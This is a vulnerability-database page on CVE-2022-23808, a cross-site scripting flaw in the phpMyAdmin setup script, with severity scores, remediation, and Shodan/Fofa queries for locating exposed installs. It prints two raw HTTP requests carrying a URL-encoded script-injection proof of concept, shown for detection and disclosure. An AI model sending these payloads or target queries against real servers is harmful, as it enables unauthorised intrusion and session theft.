🔙 목록으로 돌아가기

CVE-2022-23808: phpMyAdmin < 5.1.2 - Cross-Site Scripting

TitlephpMyAdmin < 5.1.2 - Cross-Site Scripting
Authorcckuailong,daffainfo
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the targeted user's browser, potentially leading to session hijacking, data theft, or other malicious activities.
RemediationUpgrade phpMyAdmin to version 5.1.2 or later to mitigate this vulnerability.
CVSS Score6.1
EPSS Score0.68413
CVE IDCVE-2022-23808
CWE IDCWE-79
Shodan Queryhttp.component:"phpmyadmin"http.title:"phpmyadmin"cpe:"cpe:2.3:a:phpmyadmin:phpmyadmin"
Fofa Querytitle="phpmyadmin"body="pma_servername" && body="4.8.4"
Tags cve cve2022 phpmyadmin xss vuln

🔍 Vulnerability Description

An issue was discovered in phpMyAdmin 5.1 before 5.1.2 that could allow an attacker to inject malicious code into aspects of the setup script, which can allow cross-site or HTML injection.

🌐 HTTP Request

GET /phpmyadmin/setup/index.php?page=servers&mode=test&id=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /setup/index.php?page=servers&mode=test&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.7.20) Gecko/ Firefox/3.6.8
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-23808.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-23808.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A